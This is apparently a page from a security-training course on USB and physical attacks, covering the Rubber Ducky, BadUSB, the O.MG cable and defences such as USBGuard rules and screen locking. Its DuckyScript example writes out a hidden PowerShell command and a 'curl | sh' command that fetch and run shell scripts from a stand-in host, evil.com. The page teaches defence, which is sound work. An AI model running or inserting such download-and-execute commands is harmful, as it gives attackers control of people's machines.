โ† Back to all modules
๐Ÿ”ง
โš™๏ธ Security Engineers ยท Module 7

Physical Security & Hardware Attacks

Defend against USB attacks, evil maid scenarios, DMA exploits, and hardware implants with FIDO2 keys, secure boot, and physical access controls.

๐Ÿ”Œ

USB Attack Vectors

The USB port is the most dangerous physical interface on your computer. It's designed to be universal and convenient โ€” which means it's also universally exploitable.

USB Human Interface Device (HID) Attacks

The most common USB attack class exploits the fact that USB devices self-identify their type. A device that claims to be a keyboard IS a keyboard from the OS's perspective โ€” and a keyboard can type any command.

USB Rubber Ducky

Hak5's USB Rubber Ducky looks like a standard USB flash drive but identifies itself as a keyboard. It types pre-programmed keystroke sequences at superhuman speed:

# DuckyScript โ€” opens a reverse shell in under 3 seconds
DELAY 1000
GUI r                          # Windows+R (Run dialog)
DELAY 500
STRING powershell -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://evil.com/shell.ps1')"
ENTER

# macOS variant:
DELAY 1000
GUI SPACE                      # Spotlight
DELAY 500
STRING terminal
ENTER
DELAY 1000
STRING curl http://evil.com/shell.sh | sh
ENTER

This executes in seconds. Leave your laptop unlocked at a coffee shop, someone plugs in a Rubber Ducky for 5 seconds, and your machine has a persistent backdoor.

BadUSB

BadUSB is more fundamental than the Rubber Ducky. It exploits the fact that USB controller firmware can be reprogrammed. A USB flash drive's controller can be reflashed to also identify as a keyboard, network adapter, or any other USB device class simultaneously.

BadUSB capabilities:
1. Keystroke injection (like Rubber Ducky)
2. Network interface emulation โ€” becomes a fake network adapter
   that redirects traffic through attacker's proxy
3. Mass storage + HID combo โ€” mounts a drive AND types commands
4. Firmware persistence โ€” survives reformatting the drive

O.MG Cable

The O.MG Cable is an attack tool disguised as a regular USB/Lightning cable. It contains a WiFi implant that lets an attacker remotely inject keystrokes:

Appearance: Identical to Apple Lightning cable
Capability: WiFi-enabled HID injection
Range: ~300 feet (direct) or unlimited via WiFi network
Cost: ~$120

Scenario: Attacker "accidentally" leaves a cable at a conference.
You pick it up, plug in your phone, and the cable has remote
control over your connected device.

USB Data Exfiltration

# A USB device can exfiltrate data simply by being a storage device
# that auto-copies files when mounted.

# But also via USB network:
# A USB device claiming to be an Ethernet adapter can:
# 1. Become the default network gateway
# 2. Respond to DHCP with itself as DNS
# 3. Capture all network traffic
# 4. Inject responses to redirect authenticated sessions

Defenses Against USB Attacks

Software Controls

# Linux: USBGuard โ€” whitelist authorized USB devices
sudo apt install usbguard

# Generate policy from currently connected devices
usbguard generate-policy > /etc/usbguard/rules.conf

# Rules example:
allow id 05ac:8262  # Apple internal keyboard
allow id 1050:0407  # YubiKey 5
block                # Block everything else

# macOS: No built-in USBGuard equivalent
# Use Santa (Google's security tool) or Endpoint Security framework
# Or: System Preferences โ†’ Security โ†’ Accessories โ†’ "Ask for new devices"

# Windows: Group Policy
# Computer Configuration โ†’ Admin Templates โ†’ System โ†’ Device Installation
# "Prevent installation of devices not described by other policy settings"

Physical Controls

1. USB port blockers โ€” physical plugs that prevent insertion
   (easily defeated but raises the bar)
2. USB data blockers ("USB condoms") โ€” allow charging only,
   block data pins. Essential for public charging stations.
3. Never use USB drives from unknown sources
4. Never use cables from unknown sources (O.MG Cable defense)
5. Lock your screen ALWAYS when stepping away

The Pragmatic Approach

For most engineers, the realistic defenses are:

  1. Always lock your screen (โŒ˜L on macOS, Win+L on Windows)
  2. Never plug in unknown USB devices โ€” not even to "check what's on it"
  3. Use a USB data blocker for public charging
  4. Carry your own cables โ€” don't borrow random cables
  5. Enable macOS's Accessories security (Ventura+): "Ask for new accessories"
1 / 5

๐Ÿ›ก๏ธ CyberSafe โ€” Online safety training for the whole family.